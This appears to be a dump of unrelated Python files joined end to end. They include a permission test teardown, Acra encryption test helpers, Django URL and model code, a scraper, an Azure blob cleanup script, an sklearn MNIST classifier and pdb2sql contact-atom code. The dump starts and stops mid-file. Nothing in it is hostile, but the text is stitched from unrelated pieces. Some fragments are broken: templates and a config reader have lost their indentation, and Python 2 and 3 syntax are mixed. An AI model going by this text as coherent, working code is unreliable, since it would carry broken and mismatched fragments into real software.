                writeToLog("INFO","Step 20: FAILED, member '" + self.userName3 + "' still display in sub category member tab after disable inherit permissions")
                return
            writeToLog("INFO","Step 20: preview step failed as expected: user doesn't need to a member in sub category after disable inherit members permissions")
            #########################################################################
            writeToLog("INFO","TEST PASSED: 'Categories - Enable / Disable Inherit permissions' was done successfully")
        # If an exception happened we need to handle it and fail the test
        except Exception as inst:
            self.status = clsTestService.handleException(self,inst,self.startTime)

    ########################### TEST TEARDOWN ###########################
    def teardown_method(self,method):
        try:
            self.common.handleTestFail(self.status)
            writeToLog("INFO","**************** Starting: teardown_method **************** ")
            # Best-effort cleanup of the categories created in steps 1-2.
            self.common.apiClientSession.deleteCategory(self.subCategoryName)
            self.common.apiClientSession.deleteCategory(self.parentCategoryName)
            writeToLog("INFO","**************** Ended: teardown_method *******************")
        except:
            # Cleanup failures must not mask the test result.
            pass
        clsTestService.basicTearDown(self)
        #write to log we finished the test
        logFinishedTest(self,self.startTime)
        assert (self.status == "Pass")
# Allow running this module directly. `testNum` is a class attribute, so it
# must be referenced via the class (the bare name raised NameError at module
# scope), and modern pytest.main() expects a list of arguments.
pytest.main(['test_' + Test.testNum + '.py', '--tb=line'])
# -*- coding: utf-8 -*-
# @Author : WangNing
# @Email : 3190193395@qq.com
# @File : script_variables.py
# @Software: PyCharm
# 生成脚本时,相关变量的存储
# 脚本预备:导入包
code_prepares = """#encoding=utf-8
import unittest, requests
from core.db_manager import *
import os, sys,json"""
# 脚本头部[需要连接数据库(有依赖数据)]:class, setup
code_head_with_db = '''
class %s(unittest.TestCase):
"""%s"""
def setUp(self):
self.dbd = DBManager()
self.base_url = "%s"
'''
# 脚本头部[不需要连接数据库]:class, setup
code_head = '''
class %s(unittest.TestCase):
"""%s"""
def setUp(self):
self.base_url = "%s"
'''
# 脚本结束
code_end = """
"""
# 脚本结束(带数据库连接)
code_end_with_db = """
def tearDown(self):
self.dbd.close_connect()
"""
# 结束
final_code = '''
if __name__ == '__main__':
unittest.main()
'''
# post方法
post_code = '''
def test_%s(self):
"""%s"""
%s
r = requests.post(self.base_url, data = json.dumps(payload))
result = r.json()
self.assertEqual(r.status_code, 200)
%s
'''
# get方法
get_code = '''\n
def test_%s(self):
"""%s"""
%s
r = requests.get(self.base_url + str(payload))
result = r.json()
self.assertEqual(r.status_code, 200)
%s
'''
# 校验
check_code = '''
check_point = %s
for key,value in check_point.items():
self.assertEqual(result[key], value, msg = u"字段【{}】: expection: {}, reality: {}".format(key, value, result[key]))
'''
|
# coding: utf-8
import json
import os
import subprocess
import sys
import tempfile
import shutil
from base64 import b64decode
from pythemis import smessage, scell
import yaml
# Repository root: one level above this file's directory.
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Resolve a repo-relative path to an absolute one.
abs_path = lambda x: os.path.join(BASE_DIR, x)
# Env var set when this run generated its own temp data folder (used by
# clean_test_data() to know the folder should be removed afterwards).
TEMP_DATA_GENERATED = 'TEST_RANDOM_DATA_FOLDER_GENERATE'
# Env var naming the folder that holds generated test data files.
TEMP_DATA_FOLDER_VARNAME = 'TEST_RANDOM_DATA_FOLDER'
def send_signal_by_process_name(name, signal, timeout=1):
    """Send *signal* to every process whose name matches, best-effort.

    Silently returns when no matching process exists or `pidof` does not
    answer within *timeout* seconds. (The original passed `timeout=` but
    never caught subprocess.TimeoutExpired, so a hung `pidof` crashed this
    otherwise best-effort helper.)
    """
    try:
        output = subprocess.check_output(['pidof', name], timeout=timeout)
    except (subprocess.CalledProcessError, subprocess.TimeoutExpired):
        # No matching process, or pidof didn't respond — nothing to signal.
        return
    output = output.strip().decode('utf-8').split(' ')
    for pid in output:
        os.kill(int(pid), signal)
def get_encryptor_config(new_path):
    """Return the default encryptor config path, overridable via env var."""
    return os.environ.get('TEST_ENCRYPTOR_DEFAULT_CONFIG', new_path)
def get_test_encryptor_config(config_path):
    """Return the path of the test-only encryptor config.

    Honors TEST_ENCRYPTOR_TEST_CONFIG when set; otherwise derives the path
    from the default encryptor config by appending '.test'.
    """
    derived = get_encryptor_config(config_path) + '.test'
    return os.environ.get('TEST_ENCRYPTOR_TEST_CONFIG', derived)
def clean_test_data():
    """remove temporary created folder and test files if it was generated"""
    # Only remove the folder if THIS run generated it (see get_random_data_files).
    folder = os.environ.get(TEMP_DATA_GENERATED)
    if folder:
        print("clean temporary folder <{}>".format(folder))
        shutil.rmtree(folder)
def safe_string(str_or_bytes, encoding='utf-8'):
    """Return *str_or_bytes* as text, decoding with *encoding* when needed."""
    return str_or_bytes if isinstance(str_or_bytes, str) else str_or_bytes.decode(encoding)
def get_random_data_files():
    """Return the paths of random test-data files, generating them if absent."""
    folder = os.environ.get(TEMP_DATA_FOLDER_VARNAME)
    if not folder:
        folder = tempfile.mkdtemp(None, 'test_data', None)
        # set temp folder before call generator
        os.environ.setdefault(TEMP_DATA_FOLDER_VARNAME, folder)
        # remember that we generated from script to cleanup at end
        os.environ.setdefault(TEMP_DATA_GENERATED, folder)
        print("You didn't set {} env var. Test data will be generated to <{}> "
              "folder and removed at end".format(
            TEMP_DATA_FOLDER_VARNAME, folder))
    if not os.path.exists(folder) or len(os.listdir(folder)) == 0:
        # Folder is missing or empty: run the generator script in a subprocess.
        command = [sys.executable, abs_path('tests/generate_random_data.py')]
        print('call {}'.format(' '.join(command)))
        subprocess.check_call(command, env=os.environ, cwd=os.getcwd())
    return [os.path.join(folder, i) for i in os.listdir(folder)]
def load_random_data_config():
    """Load the random-data generator settings from tests/random_data_config.json."""
    with open(abs_path('tests/random_data_config.json'), 'r') as f:
        return json.load(f)
def load_yaml_config(path):
    """Parse the YAML file at *path* (relative to BASE_DIR) into Python data."""
    with open(abs_path(path), 'r') as f:
        return yaml.safe_load(f)
def dump_yaml_config(config, path):
    """Serialize *config* as YAML to *path* (relative to BASE_DIR)."""
    with open(abs_path(path), 'w') as f:
        yaml.dump(config, f)
def load_default_config(service_name):
    """Load configs/<service_name>.yaml and normalize it for passing to Popen.

    Returns the config dict with the 'version' key removed (services reject
    unknown parameters) and None values replaced by '' (so they aren't
    rendered as the literal string "None" on the command line).
    """
    config = load_yaml_config('configs/{}.yaml'.format(service_name))
    # every config has version but service's don't have such parameter and will exit with error if we will
    # provide unexpected parameter
    # when services parse configs they ignore unknown parameters and not down for that
    skip_keys = ['version']
    for skip in skip_keys:
        # pop() with a default tolerates configs that lack the key; the
        # original `del config[skip]` raised KeyError in that case.
        config.pop(skip, None)
    # convert empty values to empty strings to avoid pass them to Popen as
    # "None" string value
    for key in config:
        if config[key] is None:
            config[key] = ''
    return config
def read_key(key_id, public, keys_dir='.acrakeys'):
    """Reads key from keystore with acra-keys."""
    visibility = '--public' if public else '--private'
    command = ['./acra-keys', 'read', '--keys_dir={}'.format(keys_dir), visibility, key_id]
    return subprocess.check_output(command)
def destroy_key(key_id, keys_dir='.acrakeys'):
    """Destroys key in the keystore with acra-keys."""
    command = ['./acra-keys', 'destroy', '--keys_dir={}'.format(keys_dir), key_id]
    return subprocess.check_output(command)
def destroy_connector_transport(client_id, keys_dir='.acrakeys'):
    """Destroy the AcraConnector transport key for *client_id*."""
    return destroy_key('client/{}/transport/connector'.format(client_id),
                       keys_dir=keys_dir)
def destroy_server_transport(client_id, keys_dir='.acrakeys'):
    """Destroy the AcraServer transport key for *client_id*."""
    return destroy_key('client/{}/transport/server'.format(client_id),
                       keys_dir=keys_dir)
def read_storage_public_key(client_id, keys_dir='.acrakeys'):
    """Read the public storage key of *client_id* from the keystore."""
    return read_key('client/{}/storage'.format(client_id),
                    public=True, keys_dir=keys_dir)
def read_zone_public_key(zone_id, keys_dir='.acrakeys'):
    """Read the public storage key of zone *zone_id* from the keystore."""
    return read_key('zone/{}/storage'.format(zone_id),
                    public=True, keys_dir=keys_dir)
def decrypt_acrastruct(data, private_key, client_id=None, zone_id=None):
    """Decrypt an AcraStruct blob with the given storage private key.

    Layout implied by the slicing below (NOTE(review): derived from these
    offsets, not from a spec — verify against the AcraStruct format docs):
    8-byte header, 45-byte ephemeral public key, 84-byte Themis-wrapped
    symmetric key, 8-byte length field, then the SecureCell-sealed payload.
    When *zone_id* is given it is passed as the SecureCell decryption context.
    `client_id` is accepted for signature parity but unused here.
    """
    public_key = data[8:8+45]
    encrypted_symmetric = data[8+45:8+45+84]
    # Unwrap the symmetric key with SecureMessage (our private + their public).
    smessage_decryptor = smessage.SMessage(private_key, public_key)
    symmetric = smessage_decryptor.unwrap(encrypted_symmetric)
    encrypted_data = data[8+45+84+8:]
    if zone_id:
        return scell.SCellSeal(symmetric).decrypt(encrypted_data, zone_id)
    else:
        return scell.SCellSeal(symmetric).decrypt(encrypted_data)
def read_storage_private_key(keys_folder, key_id):
    """Read the private storage key of client *key_id* from *keys_folder*."""
    return read_key('client/{}/storage'.format(key_id),
                    public=False, keys_dir=keys_folder)
def read_zone_private_key(keys_folder, key_id):
    """Read the private storage key of zone *key_id* from *keys_folder*."""
    return read_key('zone/{}/storage'.format(key_id),
                    public=False, keys_dir=keys_folder)
def read_poison_public_key(keys_dir):
    """Read the public poison-record key from *keys_dir*."""
    return read_key('poison-record', public=True, keys_dir=keys_dir)
def read_poison_private_key(keys_dir):
    """Read the private poison-record key from *keys_dir*."""
    return read_key('poison-record', public=False, keys_dir=keys_dir)
def prepare_encryptor_config(zone_id, config_path):
    """Rewrite zone ids in an encryptor config and save it as the test config."""
    with open(config_path, 'r') as f:
        config = yaml.safe_load(f)
    # Point every zone-bound encrypted column at the supplied zone id.
    for table in config['schemas']:
        for column in table['encrypted']:
            if 'zone_id' in column:
                column['zone_id'] = zone_id
    # Write next to the original, under the '.test' suffix (or the override
    # from TEST_ENCRYPTOR_TEST_CONFIG).
    with open(get_test_encryptor_config(config_path), 'w') as f:
        yaml.dump(config, f)
def get_bool_env(var, default=False):
    """Read a boolean value from environment variable."""
    raw = os.environ.get(var, None)
    if not raw:
        # Unset or empty: fall back to the caller-supplied default.
        return default
    lowered = raw.lower()
    if lowered in ('yes', 'y', 'true'):
        return True
    if lowered in ('no', 'n', 'false'):
        return False
    # Dunno, maybe this is an integer, use C convention
    return int(lowered) != 0
|
# -*- coding: utf-8 -*-
from django.conf.urls import url
from chloroform.views import (
ChloroformView,
ChloroformSuccessView,
)
# Raw strings for the regex patterns: in a normal string '\w' is an invalid
# escape sequence (DeprecationWarning, a SyntaxWarning from Python 3.12).
urlpatterns = [
    url(r'^$',
        ChloroformView.as_view(),
        name='default-chloroform'),
    url(r'^success/$',
        ChloroformSuccessView.as_view(),
        name='default-chloroform-success'),
    url(r'^(?P<configuration>\w+)/$',
        ChloroformView.as_view(),
        name='chloroform'),
    url(r'^(?P<configuration>\w+)/success/$',
        ChloroformSuccessView.as_view(),
        name='chloroform-success'),
]
|
# Fetch and print the price of one real-estate listing from the demo site.
import requests
from bs4 import BeautifulSoup

# A browser-like User-Agent avoids the site rejecting scripted requests.
r = requests.get("http://www.pyclass.com/real-estate/rock-springs-wy/LCWYROCKSPRINGS/", headers={'User-agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0'})
c = r.content
soup = BeautifulSoup(c, "html.parser")
# Each listing lives in a div.propertyRow; we only use the first one here.
alll = soup.find_all("div", {"class": "propertyRow"})
# .text extracts the node's text; replace() strips newlines and padding spaces.
x = alll[0].find("h4", {"class": "propPrice"}).text.replace("\n", "").replace(" ", "")
print(x)
class Antibiotic:
    """Simple record for one antibiotic and its classification metadata."""

    def __init__(self, name="", klass="", atc_code="", category="", eml=False):
        """Store the given fields on the instance.

        The original bound shared class attributes as the keyword defaults,
        which is redundant and fragile; literal defaults express the same
        behavior directly. ('klass' because 'class' is a reserved word.)
        """
        self.name = name
        self.klass = klass
        self.atc_code = atc_code
        self.category = category
        self.eml = eml  # essential-medicines-list flag (often a CSV string upstream)

    def print(self):
        """Print the record, one field per line.

        Note: intentionally shadows the built-in name inside the class
        namespace only; the global print() is still what does the output.
        """
        print("""name: %s
class: %s
atc_code: %s
category: %s
eml: %s""" % (
            self.name,
            self.klass,
            self.atc_code,
            self.category,
            self.eml))
def load_antibiotics():
    """Parse antibiotics.csv and print every successfully parsed record.

    Each line must contain at least five comma-separated fields:
    name, class, atc_code, category, eml. Blank or short lines are skipped
    explicitly; the original's bare `except Exception: pass` silently
    swallowed every error, including genuine bugs.
    """
    with open("antibiotics.csv") as antibiotics_file:
        file_contents = antibiotics_file.read()
    lines = file_contents.split("\n")
    antibiotics_list = []
    for line in lines:
        vals = line.split(",")
        if len(vals) < 5:
            # Blank trailing line or malformed row — skip it deliberately.
            continue
        antibiotics_list.append(Antibiotic(
            name=vals[0],
            klass=vals[1],
            atc_code=vals[2],
            category=vals[3],
            eml=vals[4]))
    for antibiotic in antibiotics_list:
        antibiotic.print()

# Standard Python entry-point guard: run the loader only when this file is
# executed directly, not when it is imported from another module.
if __name__ == "__main__":
    load_antibiotics()
|
import asyncio
import binascii
class WrappedProtocol(asyncio.Protocol):
    """Adapter that decodes '<hex>'-framed messages for a wrapped protocol.

    Incoming bytes are buffered; every complete '<...>' frame has its hex
    payload decoded and forwarded to the wrapped protocol's data_received().
    All other attribute access is delegated to the wrapped protocol.
    """

    def __init__(self, protocol, loop):
        self._protocol = protocol     # inner protocol receiving decoded payloads
        self._loop = loop
        self._buffer = bytearray()    # holds partial frames between reads

    def __getattr__(self, attr):
        # __getattr__ is only invoked when normal lookup already failed, so
        # the old `attr in self.__dict__` branch was dead code: delegate
        # directly to the wrapped protocol.
        return getattr(self._protocol, attr)

    def data_received(self, data):
        """Buffer raw bytes; decode and forward each complete frame."""
        self._buffer.extend(data)
        while True:
            start = self._buffer.find(b'<')
            end = self._buffer.find(b'>')
            if start == -1 or end == -1:
                # No complete message in buffer
                break
            if end < start:
                # BUG FIX: a stray '>' before the next '<' previously caused
                # an empty payload to be forwarded; discard the garbage and
                # keep scanning instead.
                del self._buffer[:end + 1]
                continue
            payload = binascii.unhexlify(self._buffer[start + 1:end])
            del self._buffer[:end + 1]
            self._protocol.data_received(payload)
async def make_isotpserver_transport(protocol_factory, host, port, loop):
    """Open a connection whose writes are hex-framed between '<' and '>'.

    The created protocol is wrapped in WrappedProtocol (which decodes
    incoming frames), and the transport's write() is monkey-patched so every
    outgoing payload is hex-encoded and framed. Returns (transport, protocol).
    """
    inner_protocol = protocol_factory()
    transport, _ = await loop.create_connection(
        lambda: WrappedProtocol(inner_protocol, loop), host, port)

    raw_write = transport.write

    def framed_write(payload):
        raw_write(b'<' + binascii.hexlify(payload) + b'>')

    # Monkey patch the write method in transport
    transport.write = framed_write
    return transport, inner_protocol
|
with open('config_file.txt') as configFile:
lines=configFile.readlines()
configs={}
for line in lines:
configs[line.rstrip('\n').split(':')[0]]=line.rstrip('\n').split(':')[1]
print configs
print "File read complete" |
from faker import Faker  # Before running this script, run `pip install faker`
from numpy.random import normal
import numpy as np

# First, let me generate some fake data...
fake = Faker()
students = []
for _ in range(100):
    # Grades are drawn from N(3, 0.5) and clipped onto the [0, 4] scale.
    record = {
        'first_name': fake.first_name(),
        'last_name': fake.last_name(),
        'address': fake.address(),
        'maths': np.clip(normal(3, .5), 0, 4),
        'linguistics': np.clip(normal(3, .5), 0, 4),
        'psychology': np.clip(normal(3, .5), 0, 4),
    }
    students.append(record)
# Now, let's try out some things!
# Parallel "column" lists: index i in each list describes the same student.
first_names = []
last_names = []
addresses = []
maths_grades = []
linguistics_grades = []
psychology_grades = []
# Can you write a loop that fills the above separate lists from the students list of dictionaries?
for student in students:
    first_names.append(student['first_name'])
    last_names.append(student['last_name'])
    addresses.append(student['address'])
    maths_grades.append(student['maths'])
    linguistics_grades.append(student['linguistics'])
    psychology_grades.append(student['psychology'])
# Now, can you turn it into a pandas dataframe?
import pandas as pd  # noqa: E402
students_df = pd.DataFrame(students)
print(students_df)
# What if you wanted to create a 3x100 numpy array of all the grades? (excluding other information)
import numpy as np  # noqa: E402
grades = np.array([maths_grades, linguistics_grades, psychology_grades])
print(grades)
# Now, try to do the following for all four data structures:
# (list of dictionaries, separate lists, dataframe, array)
# Don't spend more than 20 minutes on any of these!
# Thinking about the solution is more important than programming it.
# 1. Get all the information belonging to the 20th student
print(students[19])  # List of dictionaries
print(first_names[19], last_names[19], addresses[19], maths_grades[19], linguistics_grades[19], psychology_grades[19])  # Separate lists
print(students_df.iloc[19])  # Dataframe
print(grades[:, 19])  # Array (rows are subjects, columns are students)
# 2. Find the student with the highest linguistics grade
# List of dictionaries
# NOTE(review): if every linguistics grade were exactly 0 (grades are clipped
# to [0, 4]), highest_student would stay None — confirm that is acceptable.
highest = 0
highest_student = None
for student in students:
    if student['linguistics'] > highest:
        highest = student['linguistics']
        highest_student = student
print(highest_student)
# Separate lists
highest = max(linguistics_grades)
highest_index = linguistics_grades.index(highest)
print(first_names[highest_index], last_names[highest_index], linguistics_grades[highest_index])
# Dataframe
highest_index = students_df['linguistics'].argmax()
print(students_df.iloc[highest_index])
# Array: row 1 holds the linguistics grades
highest_index = grades[1, :].argmax()
print(grades[:, highest_index])  # This will only print the grades of the student with the highest linguistics grade
# 3. Calculate the average grade per student; (maths + linguistics + psychology) / 3
# List of dictionaries
for student in students:
    student['average'] = (student['maths'] + student['linguistics'] + student['psychology']) / 3
print(students[0])  # We only print the first student to check, to not clutter up the output too much
# Separate lists
average_grades = []
for i in range(len(linguistics_grades)):
    average_grades.append((maths_grades[i] + linguistics_grades[i] + psychology_grades[i]) / 3)
print(average_grades[0])
# Dataframe
students_df['average'] = (students_df['maths'] + students_df['linguistics'] + students_df['psychology']) / 3
print(students_df.iloc[0])
# Array: mean over axis 0 collapses the three subject rows per student
averages = grades.mean(axis=0)
print(averages[0])
|
# Read N and search for a "generator" of N: a number i whose value plus its
# digit sum equals N. Any generator satisfies i >= N - 9*len(str(N)), so
# scanning upward from N//2 is safe for the positive inputs this handles.
# Fixes: integer halving with // instead of int(num/2), removed the unused
# list `l`, and dropped the redundant list() around the digit iteration.
num = int(input())
for i in range(num // 2, num):
    if i + sum(map(int, str(i))) == num:
        print(1)
        print(i)
        break
else:
    # No generator exists below num
    print(0)
|
from django.db import models
class Radio(models.Model):
    """A radio station belonging to the 'playlist' app."""
    radio_id = models.AutoField(primary_key=True)
    radio_name = models.CharField(max_length=100)
    radio_description = models.TextField(blank=True, null=True)

    class Meta:
        # BUG FIX: this was `class meta` (lowercase). Django only honors the
        # capitalized `Meta` inner class, so app_label was never applied.
        app_label = 'playlist'

    def __str__(self):
        return f'{self.radio_name}'
|
from django.db import models, migrations
# (old parameter prefix, new extension module name) pairs. Stored parameter
# names beginning with the old prefix are rewritten to the new prefix by
# the rename_parameters() data migration below.
APPLICATIONS = [
    ("admin", "modoboa_admin"),
    ("amavis", "modoboa_amavis"),
    ("limits", "modoboa_admin_limits"),
    ("postfix_autoreply", "modoboa_postfix_autoreply"),
    ("postfix_relay_domains", "modoboa_admin_relaydomains"),
    ("radicale", "modoboa_radicale"),
    ("stats", "modoboa_stats"),
    ("sievefilters", "modoboa_sievefilters"),
    ("webmail", "modoboa_webmail"),
]
def rename_app_parameters(app, model):
    """Rename all parameters for a given app.

    Args:
        app: an (old_prefix, new_prefix) tuple from APPLICATIONS.
        model: Parameter-like model whose `name` field holds "prefix.key".
    """
    old_prefix = "{}.".format(app[0])
    new_prefix = "{}.".format(app[1])
    # Filter on the dotted prefix so e.g. "admin" does not also match
    # parameters of an unrelated app whose name merely starts with "admin"
    # (the old filter matched the bare prefix and re-saved untouched rows).
    qset = model.objects.filter(name__startswith=old_prefix)
    for param in qset:
        param.name = param.name.replace(old_prefix, new_prefix)
        param.save()
def rename_parameters(apps, schema_editor):
    """Rename old parameters."""
    # Apply the rename to both the global and the per-user parameter tables.
    parameter_models = (
        apps.get_model("lib", "Parameter"),
        apps.get_model("lib", "UserParameter"),
    )
    for app in APPLICATIONS:
        for parameter_model in parameter_models:
            rename_app_parameters(app, parameter_model)
class Migration(migrations.Migration):
    """Data migration: rewrite stored parameter name prefixes."""

    dependencies = [
        ('lib', '0001_initial'),
    ]
    operations = [
        # Forward-only: no reverse function is provided.
        migrations.RunPython(rename_parameters)
    ]
|
import os, uuid, re
from datetime import datetime, timedelta
from azure.storage.blob import BlobServiceClient, BlobClient, ContainerClient
# Storage-account connection string (must be filled in before running).
connect_str = ""

# param of how old data we want to delete: anything dated on/before this
# cutoff (180 days ago) is removed.
date_from_delete = datetime.today() + timedelta(days=-180)
print(date_from_delete)

# Walk the 'datalake' container and delete date-partitioned blobs
# ('data/date=YYYY-MM-DD...') older than the cutoff.
try:
    blob_service_client = BlobServiceClient.from_connection_string(connect_str)
    container_client = ContainerClient.from_connection_string(
        connect_str, container_name="datalake")
    for blob in container_client.list_blobs():
        if not blob.name.startswith('data/date='):
            continue
        # Characters 10-19 of the name hold the partition date.
        partition_date = datetime.strptime(blob.name[10:20], '%Y-%m-%d').date()
        if partition_date <= date_from_delete.date():
            container_client.delete_blob(blob.name)
except Exception as ex:
    print('Exception:')
    print(ex)
|
from yabadaba import databasemanager
from .IprPyDatabase import IprPyDatabase
# Extend the yabadaba CDCSDatabase to include IprPyDatabase operations
class CDCSDatabase(databasemanager.get_class('cdcs'), IprPyDatabase):
    """yabadaba's dynamically loaded 'cdcs' database class combined with
    IprPyDatabase's iprPy-specific operations; all behavior comes from the
    two base classes, so no overrides are needed here.
    """
    pass
#-------------------------------------------------------------------------------
# Name: module1
# Purpose:
#
# Author: Stephanie
#
# Created: 08/03/2015
# Copyright: (c) Stephanie 2015
# Licence: <your licence>
#-------------------------------------------------------------------------------
from sklearn import preprocessing
from sklearn.datasets import load_svmlight_file
from sklearn import linear_model, metrics
from sklearn.naive_bayes import GaussianNB
import pdb
def preprocess(X):
    '''Standardize each feature, then normalize each sample, returning the
    transformed copy of X.'''
    standardized = preprocessing.StandardScaler().fit_transform(X)
    return preprocessing.Normalizer().fit_transform(standardized)
def GNB(X, y):
    '''Fit and return a Gaussian Naive Bayes classifier on (X, y).'''
    return GaussianNB().fit(X, y)
def SVM(X, y):
    '''Fit and return an SGD classifier with logistic loss on (X, y).'''
    classifier = linear_model.SGDClassifier(loss='log')
    return classifier.fit(X, y)
def test(model, X_test, y_test):
    """Print a per-class precision/recall/F1 report for model's predictions
    on (X_test, y_test)."""
    #prediction
    # pred = model.predict(X_test)
    # print("mislabeled %d out of %d total" %((y_test != pred).sum(), X_test.shape[0]))
    # #score
    # print model.score(X_test, y_test)*100, "%"
    print metrics.classification_report(y_test, model.predict(X_test))
    return
def main():
    """Load MNIST (svmlight format), standardize, train an SGD classifier
    and report train/test classification metrics."""
    ''' Get Data '''
    x_train, y_train = load_svmlight_file('mnist')
    x_train = x_train.toarray()
    x_test, y_test = load_svmlight_file('mnist.t')
    x_test = x_test.toarray()
    # Fit the scaler on the training data only, then apply it to both sets.
    std_scale = preprocessing.StandardScaler().fit(x_train)
    x_train = std_scale.transform(x_train)
    x_test = std_scale.transform(x_test)
    ''' Preprocess '''
    proc_x_train = preprocess(x_train)
    ''' Train Model '''
    # NOTE(review): the model is trained on preprocess(x_train) (standardized
    # + normalized) but evaluated below on the merely standardized
    # x_train/x_test — confirm this mismatch is intentional.
    model_SVM = SVM(proc_x_train, y_train)
    ''' Test Model '''
    print "SVM accuracy on training data:"
    test(model_SVM, x_train, y_train)
    print "SVM accuracy on testing data:"
    test(model_SVM, x_test, y_test)
    return
# Script entry point
if __name__ == '__main__':
    main()
import numpy as np
import itertools
import warnings
from .pdb2sqlcore import pdb2sql
class interface(pdb2sql):

    def __init__(self, pdb, **kwargs):
        """Create an independent SQL database for interface object.

        Args:
            pdb(str, list, ndarray, pdb2sql): pdb file or data, or pdb2sql object.
                If pdb2sql object is used, all changes in the database of pdb2sql
                object before initializing the interface instance will be used in the
                new sql database of the interface instance; afterwards, two databses
                will be independent from each other.

        Examples:
            >>> from pdb2sql import pdb2sql
            >>> from pdb2sql import interface
            >>> # use pdb2sql object as input
            >>> pdb_db = pdb2sql('3CRO.pdb')
            >>> interface_db1 = interface(pdb_db)
            >>> # use pdb file as input
            >>> interface_db2 = interface('3CRO.pdb')
        """
        if isinstance(pdb, pdb2sql):
            # Flush pending changes, then round-trip through PDB lines so the
            # new database is fully detached from the source object.
            pdb._commit()
            pdb = pdb.sql2pdb()
        super().__init__(pdb, **kwargs)

    def __repr__(self):
        return f'{self.__module__}.{self.__class__.__name__} object'

    ##########################################################################
    #
    # get the contact atoms
    #
    ##########################################################################

    def get_contact_atoms(
            self,
            cutoff=8.5,
            allchains=False,
            chain1='A',
            chain2='B',
            extend_to_residue=False,
            only_backbone_atoms=False,
            excludeH=False,
            return_contact_pairs=False):
        """Get rowIDs of contact atoms.

        Args:
            cutoff (float): distance cutoff for calculating contact.
                Defaults to 8.5.
            allchains (bool): calculate contacts for all chains or not.
                Defaults to False.
            chain1 (str): first chain ID. Defaults to 'A'.
                Used when 'allchains' is False.
            chain2 (str): second chain ID. Defaults to 'B'.
                Used when 'allchains' is False.
            extend_to_residue (bool): get all atoms of the residues containing
                at least one contact atom. Defaults to False.
            only_backbone_atoms (bool): only use backbone atoms to
                calculate contact or not. Defaults to False.
            excludeH (bool): Exculde hydrogen atoms for contact
                calculation or not. Defaults to False.
            return_contact_pairs (bool): if return atomic contact pairs
                or not. Defaults to False.

        Returns:
            dict: rowID of contact atoms or rowID of contact atom pairs
        """
        if allchains:
            chainIDs = self.get_chains()
        else:
            chainIDs = [chain1, chain2]
            chains = self.get_chains()
            for c in chainIDs:
                if c not in chains:
                    raise ValueError(
                        'chain %s not found in the structure' % c)

        # Per-chain coordinate/rowID/name caches pulled once from SQL.
        xyz = dict()
        index = dict()
        resName = dict()
        atName = dict()
        for chain in chainIDs:
            data = np.array(
                self.get('x,y,z,rowID,resName,name', chainID=chain))
            xyz[chain] = data[:, :3].astype(float)
            index[chain] = data[:, 3].astype(int)
            resName[chain] = data[:, -2]
            atName[chain] = data[:, -1]

        # loop through the first chain
        # TODO : loop through the smallest chain instead ...
        #index_contact_1,index_contact_2 = [],[]
        #index_contact_pairs = {}
        index_contact = dict()
        index_contact_pairs = dict()

        # Examine every unordered chain pair; contacts accumulate per chain.
        for chain1, chain2 in itertools.combinations(chainIDs, 2):
            xyz1 = xyz[chain1]
            xyz2 = xyz[chain2]
            atName1 = atName[chain1]
            atName2 = atName[chain2]
            if chain1 not in index_contact:
                index_contact[chain1] = []
            if chain2 not in index_contact:
                index_contact[chain2] = []
            for i, x0 in enumerate(xyz1):
                # compute the contact atoms
                contacts = np.where(
                    np.sqrt(np.sum((xyz2 - x0)**2, 1)) <= cutoff)[0]
                # exclude the H if required
                if excludeH and atName1[i][0] == 'H':
                    continue
                if len(contacts) > 0 and any(
                        [not only_backbone_atoms, atName1[i] in self.backbone_atoms]):
                    # Filter the partner atoms by backbone/hydrogen criteria.
                    pairs = [
                        index[chain2][k] for k in contacts if any(
                            [
                                atName2[k] in self.backbone_atoms,
                                not only_backbone_atoms]) and not (
                            excludeH and atName2[k][0] == 'H')]
                    if len(pairs) > 0:
                        index_contact_pairs[index[chain1][i]] = pairs
                        index_contact[chain1] += [index[chain1][i]]
                        index_contact[chain2] += pairs

        # if no atoms were found
        if len(index_contact_pairs) == 0:
            warnings.warn('No contact atoms detected in pdb2sql')

        # get uniques
        for chain in chainIDs:
            index_contact[chain] = sorted(set(index_contact[chain]))

        # extend the list to entire residue
        if extend_to_residue:
            for chain in chainIDs:
                index_contact[chain] = self._extend_contact_to_residue(
                    index_contact[chain], only_backbone_atoms)

        # not sure that's the best way of dealing with that
        # TODO split to two functions get_contact_atoms and
        # get_contact_atom_pairs
        if return_contact_pairs:
            return index_contact_pairs
        else:
            return index_contact

    # extend the contact atoms to the residue
    def _extend_contact_to_residue(self, index1, only_backbone_atoms):
        """Return rowIDs of ALL atoms of every residue that contains at least
        one atom in index1 (restricted to backbone atoms when requested)."""

        # extract the data
        dataA = self.get('chainID,resName,resSeq', rowID=index1)
        #dataB = self.get('chainID,resName,resSeq',rowID=index2)

        # create tuple cause we want to hash through it
        dataA = list(map(lambda x: tuple(x), dataA))
        #dataB = list(map(lambda x: tuple(x),dataB))

        # extract uniques
        resA = list(set(dataA))
        #resB = list(set(dataB))

        # init the list
        index_contact_A = []

        # contact of chain A
        for resdata in resA:
            chainID, resName, resSeq = resdata
            if only_backbone_atoms:
                index = self.get(
                    'rowID',
                    chainID=chainID,
                    resName=resName,
                    resSeq=resSeq)
                name = self.get(
                    'name',
                    chainID=chainID,
                    resName=resName,
                    resSeq=resSeq)
                index_contact_A += [ind for ind,
                                    n in zip(index,
                                             name) if n in self.backbone_atoms]
            else:
                index_contact_A += self.get('rowID',
                                            chainID=chainID,
                                            resName=resName,
                                            resSeq=resSeq)

        # make sure that we don't have double (maybe optional)
        index_contact_A = sorted(set(index_contact_A))

        return index_contact_A

    # get the contact residue
    def get_contact_residues(
            self,
            cutoff=8.5,
            allchains=False,
            chain1='A',
            chain2='B',
            excludeH=False,
            only_backbone_atoms=False,
            return_contact_pairs=False):
        """Get contact residues represented with (chain,resSeq, resname).

        Args:
            cutoff (float): distance cutoff for contact calculation
                Defaults to 8.5.
            allchains (bool): calculate contacts for all chains or not.
                Defaults to False.
            chain1 (str): first chain ID. Defaults to 'A'.
            chain2 (str): second chain ID. Defaults to 'B'.
            excludeH (bool): Exculde hydrogen atoms for contact
                calculation or not. Defaults to False.
            only_backbone_atoms (bool): only use backbone atoms to
                calculate contact or not. Defaults to False.
            return_contact_pairs (bool): if return residue contact pairs
                or not. Defaults to False.

        Returns:
            dict: (chain,resSeq,resName) of contact residues or
                contact residue pairs.
        """
        # TODO split this func to two functions
        # TODO get_contact_residues and get_contact_residue_pairs

        # get the contact atoms
        if return_contact_pairs:

